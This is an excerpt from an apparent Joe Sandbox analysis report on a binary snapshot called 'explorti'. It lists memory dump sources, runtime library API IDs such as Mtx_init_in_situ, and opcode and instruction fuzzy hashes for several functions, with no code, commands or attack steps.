                    • Instruction Fuzzy Hash: 04B1F3329002859FDB15CF68C891FFEBBA6EF55360F1481AEE849EB341D6349D42CB64
                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                    • Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_690000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: Xtime_diff_to_millis2_xtime_get
                    • String ID:
                    • API String ID: 531285432-0
                    • Opcode ID: 2a93c63c738d40f9a1acacdaceee48b1f50402f1dbad0ecf2beec9380bd9bc5f
                    • Instruction ID: 635c8928090f637271836f19d8d538a78d966801ce8b738f0ed230705b7f1222
                    • Opcode Fuzzy Hash: 2a93c63c738d40f9a1acacdaceee48b1f50402f1dbad0ecf2beec9380bd9bc5f
                    • Instruction Fuzzy Hash: FD214F71E002099FDF10EFA4CC819BEBBBAEF09724F004069F601A7261DB70AD419FA5
                    APIs
                    • __Mtx_init_in_situ.LIBCPMT ref: 006A726C
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                    • Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_690000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_init_in_situ
                    • String ID: @.i$`zj
                    • API String ID: 3366076730-1876111630
                    • Opcode ID: 0abdf204bb764c7209e761d3ecff97c09fb311f89c6a6ec0271f765ab6b613b5
                    • Instruction ID: 38bfc23f6ab18ee46d44fa301a7efa236fcd18fc1ec73a06e152d6f39f1ce114
                    • Opcode Fuzzy Hash: 0abdf204bb764c7209e761d3ecff97c09fb311f89c6a6ec0271f765ab6b613b5
                    • Instruction Fuzzy Hash: 49A136B0A016198FDB21DFA8C88479EBBF2FF49710F198159E819AB351EB759D01CF90
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                    • Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_690000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___free_lconv_mon
                    • String ID: 8"o$`'o
                    • API String ID: 3903695350-933842191
                    • Opcode ID: 32400f45af36b020cf76089e8dd93c997aab0cea0f564ba661f4129589adc935
                    • Instruction ID: 9248d418faefcafba4a94d15fec1455e5dbff61aa11b2a86e6c0a3192fae04bd
                    • Opcode Fuzzy Hash: 32400f45af36b020cf76089e8dd93c997aab0cea0f564ba661f4129589adc935
                    • Instruction Fuzzy Hash: EC315C31600209AFEB61ABB8E945FBA77EBEF00314F10452DE44AD7291DF76ED808B55
                    APIs
                    • __Mtx_init_in_situ.LIBCPMT ref: 00693962
                    • __Mtx_init_in_situ.LIBCPMT ref: 006939A1
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                    • Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_690000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_init_in_situ
                    • String ID: pBi
                    • API String ID: 3366076730-1569801529
                    • Opcode ID: 16c3e0898b53cef74d63c2cd694bc82ab7a4a4238ad9a886e09ab18084d7d685
                    • Instruction ID: 2b12b4c3390c3dfd35f919c79d3ff4cde56762313a33dd1cf56168a815ebcf9c
                    • Opcode Fuzzy Hash: 16c3e0898b53cef74d63c2cd694bc82ab7a4a4238ad9a886e09ab18084d7d685
                    • Instruction Fuzzy Hash: E14114B05017059FDB20CF19C588B9ABBF6FF44315F14861DE86A8B741E7B5AA15CF80
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 00692552
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                    • Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_690000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy
                    • String ID: P#i$P#i
                    • API String ID: 2659868963-1653140521
                    • Opcode ID: d951a50c267069fba03e27008f9e6e82f4bd9ad6aaba1d37c02d8b0cf13b26e9
                    • Instruction ID: f840145ac6f1e9b1f8eb9fb104a4088243594ac634529d59fb51109788ef4c5a
                    • Opcode Fuzzy Hash: d951a50c267069fba03e27008f9e6e82f4bd9ad6aaba1d37c02d8b0cf13b26e9
                    • Instruction Fuzzy Hash: 5FF08271D1124D9BCB14DFA8D841A9EBBF6AF55304F1082AEE44467200EA705A94CB99